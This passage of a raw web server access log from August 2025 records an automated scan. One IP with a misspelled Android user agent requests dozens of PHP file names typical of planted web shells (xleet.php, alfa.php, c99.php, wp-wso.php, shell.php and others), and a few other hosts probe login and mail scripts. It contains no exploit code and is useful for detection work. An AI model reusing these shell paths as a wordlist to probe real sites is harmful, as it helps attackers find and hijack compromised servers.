AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:54:36 -0400] "GET /alwso.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:54:38 -0400] "GET /ups.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:54:39 -0400] "GET /wp-content/xleet.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:54:41 -0400] "GET /media-admin.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:54:44 -0400] "GET /sym.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:54:52 -0400] "GET /xlt.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:54:57 -0400] "GET /sym403.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:54:59 -0400] "GET /fw.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:00 -0400] "GET /wp.-.admin.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:04 -0400] "GET /symlink.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:13 -0400] "GET /shell.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:16 -0400] "GET /1.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:17 -0400] "GET /xleet.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:18 -0400] "GET /data.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:20 -0400] "GET /wp-blog.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:31 -0400] "GET /b.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:33 -0400] "GET /wp-content/plugins/xt/index.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:37 -0400] "GET /c.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:46 -0400] "GET /shx.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:58 -0400] "GET /alfa.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:55:58 -0400] "GET /wp-admin/xleet-shell.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:56:00 -0400] "GET /wp-content/xleet.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:56:04 -0400] "GET /.well-known/pki-validation/wp.-.admin.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:21:56:10 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:21:56:10 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:21:56:10 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:21:56:10 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:21:56:14 -0400] "GET /a.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:56:27 -0400] "GET /old-index.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:56:29 -0400] "GET /xleet.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:56:35 -0400] "GET /FoxWSO.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:56:44 -0400] "GET /templates/beez3/wp.-.admin.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:56:53 -0400] "GET /wp-admin/xleet-shell.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:56:53 -0400] "GET /x.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:57:00 -0400] "GET /403.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:57:08 -0400] "GET /mini.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:57:20 -0400] "GET /images/class.api.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:57:29 -0400] "GET /imagesvuln.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:57:34 -0400] "GET /edit-form.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:57:38 -0400] "GET /wikindex.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:57:43 -0400] "GET /m.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:57:53 -0400] "GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:58:00 -0400] "GET /0byte.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:58:06 -0400] "GET /xx.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:58:18 -0400] "GET /libraries/wp.-.admin.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:58:28 -0400] "GET /new-index.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:58:38 -0400] "GET /wp.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:58:48 -0400] "GET /wp-wso.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:58:58 -0400] "GET /qindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:59:27 -0400] "GET /priv8.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:21:59:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:21:59:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:21:59:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:21:59:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:21:59:36 -0400] "GET /minimo.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:21:59:54 -0400] "GET /xleet.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:00:06 -0400] "GET /V3.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:00:15 -0400] "GET /V5.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:00:29 -0400] "GET /404.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:00:34 -0400] "GET /up.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:00:49 -0400] "GET /www.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:01:10 -0400] "GET /100.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:01:15 -0400] "GET /777.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:01:19 -0400] "GET /defau1t.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:01:21 -0400] "GET /f.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:01:25 -0400] "GET /xox.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:01:37 -0400] "GET /o.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:01:42 -0400] "GET /new.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:01:46 -0400] "GET /sindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:01:50 -0400] "GET /baindex.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:02:05 -0400] "GET /wp-content/uploads/class.api.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:02:13 -0400] "GET /wi.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:02:25 -0400] "GET /mar.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:02:38 -0400] "GET /root.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:03:08 -0400] "GET /nee.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:03:10 -0400] "GET /v.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:03:13 -0400] "GET /z.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:03:23 -0400] "GET /g.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:03:28 -0400] "GET /c99.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:03:43 -0400] "GET /w.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:03:46 -0400] "GET /ws.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:03:53 -0400] "GET /2.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:03:56 -0400] "GET /lol.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:03:59 -0400] "GET /87.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:04:13 -0400] "GET /7yn.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:22:04:20 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:22:04:20 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:22:04:20 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:22:04:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:22:04:22 -0400] "GET /haxor.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:04:33 -0400] "GET /13.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:04:40 -0400] "GET /e.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:04:56 -0400] "GET /r.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:05:03 -0400] "GET /t.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:05:15 -0400] "GET /y.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:05:20 -0400] "GET /u.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 